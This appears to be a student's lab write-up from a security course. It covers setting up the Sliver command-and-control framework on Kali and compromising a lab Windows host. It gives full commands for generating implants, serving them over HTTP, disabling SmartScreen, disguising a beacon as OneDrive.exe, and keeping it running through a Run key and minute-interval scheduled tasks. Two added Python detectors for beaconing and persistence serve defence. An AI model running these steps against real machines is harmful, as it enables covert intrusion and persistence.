SEC 440 C2 Sliver - JadenGil/Jaden-Tech-Journal GitHub Wiki

Setting up the Kali Box

To start things off I made sure that the Kali box was connected to my LAN cable and I added the following for network settings:

Setting VyOS rules:

set interfaces ethernet eth0 address 192.168.1.3/24
set protocols rip interface eth0
set protocols rip network 192.168.1.1/24
set protocols static route 0.0.0.0/0 next-hop 192.168.1.3
set service dns forwarding allow-from 192.168.1.1/24
set service dns forwarding listen-address 192.168.1.1
set service dns forwarding system
set service ssh listen-address 0.0.0.0
set system name-server 192.168.1.1
delete protocols static route 0.0.0.0/0 next-hop 192.168.1.1 (had added this on accident)
set nat source rule 10 source address 192.168.1.0/24

Note: if "Ign" appears next to a file being downloaded in the terminal, that file is being ignored.

image

Restart the network and the box will now be connected to the internet and we can move forward.


Installing and working with Sliver:

Installed Sliver using sudo apt install sliver --fix-missing

To get into Sliver enter sliver-server:

image

Deliverable 1.1:

What is the protocol and port number that the server is running on and can we change it to something different?

The protocol is TCP and the port number is 31337. Yes, it can be changed to something different by using the listeners commands. But more on that later.

image

Creating a new operator on the "sliver-server" tab so I can use "sliver-client" on another window:

Command used:

image

To run "sliver-client" the following should be entered:

image

Then entering sliver-client on the command line should connect you:

image

Although nothing else should be running, it is important to check that there are no other sessions running:

image


Task 2 Creating and using implants:

image

First off we need to create a profile. We can do so by entering profiles new --mtls 192.168.1.10 --format exe --os windows --arch amd64 windows-session into the command line

Breakdown of the options (from the google doc):

  • new: to tell Sliver we want to create a new profile
  • mtls: the type of communication channel to be used
  • format: the type of implant
  • os: the targeted operating system
  • arch: the architecture used by our targeted system
  • windows-session: the name of our new profile (it could be anything of your choice)

image

Next we need to make the beacon profile which is done by entering profiles new beacon --mtls 192.168.1.10 --format exe --seconds 5 --jitter 3 --os windows --arch amd64 windows-beacon

Breakdown of the new options (from the google doc):

  • seconds: duration to connect back to the C2
  • jitter: randomize the call back to home
  • windows-beacon: the name used for this profile (it could be anything of your choice)

image
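From the defender's side, the seconds and jitter options decide how regular the implant's check-ins look on the network. The following added example (not part of the original lab or of Sliver) flags host pairs whose connection gaps are nearly constant; the flow records are constructed, and it assumes each check-in appears as a separate connection spaced 5 to 8 seconds apart (seconds plus up to jitter).

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records: (epoch seconds, source host, destination IP, destination port).
# WKS1 -> 192.168.1.10:8888 mimics a 5 s interval with up to 3 s jitter (assumed semantics).
FLOWS = [(t, "WKS1", "192.168.1.10", 8888)
         for t in (1000.0, 1005.4, 1013.3, 1019.4, 1024.4, 1031.6, 1038.2, 1044.0)]
# Ordinary browsing from the same host: bursty and irregular.
FLOWS += [(t, "WKS1", "203.0.113.20", 443)
          for t in (1000.0, 1001.0, 1002.0, 1060.0, 1061.0, 1300.0, 1302.0)]
# Too few events to judge.
FLOWS += [(t, "WKS1", "198.51.100.7", 53) for t in (1000.0, 1006.0, 1012.0)]


def find_beacons(flows, min_events=6, max_cv=0.35):
    """Map (src, dst, port) -> (mean gap, coefficient of variation) for regular talkers."""
    times_by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        times_by_pair[(src, dst, port)].append(ts)

    hits = {}
    for pair, times in times_by_pair.items():
        if len(times) < min_events:
            continue  # not enough samples for a stable estimate
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:
            continue
        cv = pstdev(gaps) / avg  # low CV = near-constant interval, even with jitter
        if cv <= max_cv:
            hits[pair] = (round(avg, 2), round(cv, 3))
    return hits


if __name__ == "__main__":
    for pair, (avg, cv) in find_beacons(FLOWS).items():
        print(pair, "mean gap", avg, "cv", cv)
```

A larger jitter relative to the interval raises the coefficient of variation, so max_cv has to be tuned against the site's normal traffic.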

We can ensure these went through properly by using the profiles command. This should present you with all the profiles.

Deliverable 2.1:

image

We can generate a beacon implant by using these 2 commands:

profiles generate --save ~/Public/imp1.exe windows-session
profiles generate --save ~/Public/beacon1.exe windows-beacon

Note: I accidentally named my profile "windowws-session" (2 W's) instead of "windows-session" (1 W). This doesn't cause issues, but the commands might be different from what's shown in the pictures.

image

image

Deliverable 2.2:

image

Now it's time to get a directory prepared for our files.

To start, we need to make a directory inside /var/www/html/ using the command sudo mkdir /var/www/html/files

Once that is made, we copy the contents of ~/Public/*.exe into the "files" directory with sudo cp ~/Public/*.exe /var/www/html/files, then make sure the directory has the proper permissions with sudo chmod -R 755 /var/www/html/files/

All commands used:

image

Now for the moment of truth. If everything has gone well up to this point we should be able to use the mtls command on the sliver-server and it will start job #2 which will be running on port 8888

Confirmation that this worked in my environment:

image

Now the listener is up and all the files we need are ready to go. On the victim system I'm testing (WKS1), I opened the browser, navigated to 192.168.1.10 (the Kali system's IP), and downloaded the implants.

First, I right-clicked imp1 and ran it as administrator. Back on the Kali box, the sessions command now shows that the implant is working:

image

Now using the use command on sliver-client we can type use <session-id> and that'll connect us to the WKS1 machine

Deliverable 3.1:

image

We will want to disable Windows SmartScreen, which can be done from the Kali box through our session using the command execute -o REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"

image

Now we want to move beacon1.exe over to the windows machine under the name OneDrive.exe which we can accomplish by using upload '/var/www/html/files/beacon.exe' 'C:\Users\Public\OneDrive.exe' on the comm

image

Now we want OneDrive.exe to execute on the victim system, which we can accomplish by adding it to the current user's Run key so that it starts at logon: execute -o reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OneDriveUpdater" /t REG_SZ /F /D "C:\Users\Public\OneDrive.exe"

Deliverable 4.1:

image

Now we need to add a fake network task and schedule it on the victim system which we can do by using the following: execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN PingBing /TR "cmd.exe /c ping -c 10 bing.com"

The output should look something like this:

image

Now it's time to add the configuration to run imp1.exe. In this case, we upload it under another name and create another scheduled task for it, which can be done by running the following commands:

upload '/var/www/html/files/implant.exe' 'C:\Users\Public\Downloads\Checkme.exe'

execute -o schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN CheckMe /TR C:\Users\Public\Downloads\Checkme.exe

Upload:

image
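The SmartScreen change, the Run key and the two minute-interval scheduled tasks above all leave process-creation command lines behind. As an added example (not part of the original lab), this detector classifies such command lines; the events are constructed from the commands on this page, and WKS2 with its benign entries is hypothetical.

```python
import re

# Paths any user can write to; C:\Users\Public is the drop location used on this page.
USER_WRITABLE = re.compile(r"c:\\users\\(public|[^\\]+\\appdata)\\", re.I)


def has(pattern, cmd):
    return re.search(pattern, cmd, re.I) is not None


def classify(cmd):
    """Return the names of the tamper/persistence rules a command line trips."""
    hits = []
    if has(r"\breg(\.exe)?\s+add\b", cmd):
        if has(r"smartscreenenabled", cmd) and has(r'/d\s+"?off\b', cmd):
            hits.append("smartscreen_disabled")
        if has(r"\\currentversion\\run(once)?\b", cmd) and USER_WRITABLE.search(cmd):
            hits.append("run_key_user_writable")
    if has(r"\bschtasks(\.exe)?\s+/create\b", cmd) and has(r"/sc\s+minute\b", cmd):
        if USER_WRITABLE.search(cmd):
            hits.append("minute_task_user_writable")
        elif has(r'/tr\s+"?cmd(\.exe)?\s+/c\b', cmd):
            hits.append("minute_task_shell")
    return hits


# Constructed process-creation events: (host, command line).
EVENTS = [
    ("WKS1", r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d "Off"'),
    ("WKS1", r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "OneDriveUpdater" /t REG_SZ /F /D "C:\Users\Public\OneDrive.exe"'),
    ("WKS1", r'schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN PingBing /TR "cmd.exe /c ping -c 10 bing.com"'),
    ("WKS1", r'schtasks /Create /F /SC MINUTE /MO 3 /ST 18:00 /TN CheckMe /TR C:\Users\Public\Downloads\Checkme.exe'),
    ("WKS2", r'schtasks /Create /SC DAILY /TN Backup /TR "C:\Program Files\Backup\run.exe"'),
    ("WKS2", r'reg add "HKCU\Software\Example" /v Theme /t REG_SZ /d Dark'),
]


def scan(events):
    """Return (host, rule) pairs for every rule tripped, in event order."""
    return [(host, rule) for host, cmd in events for rule in classify(cmd)]


if __name__ == "__main__":
    for host, rule in scan(EVENTS):
        print(host, rule)
```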

Deliverable 4.2:

Recording.2024-11-06.201624.mp4

Getting system:

image

Once we run the command above, another session opens up and we can now gain authoritative access.

Deliverable 4.3:

image


Reflection

Overall, this was a pretty simple lab where I ran into very few roadblocks. In fact, the only time I had issues was when I was getting the new IP address on the Kali box working so I could connect to the Internet. Because of that experience, I know that I should really try to familiarize myself with the VyOS environment because I've had a lot of issues with it in the past.

Otherwise, this lab was nothing but beneficial. I genuinely really enjoy the Sliver software despite its quirks. Everything was easy to understand and I was able to grasp all of the information with ease. It was also something that I had never used previously so it was really fun to just mess with something new and gain a new skill.
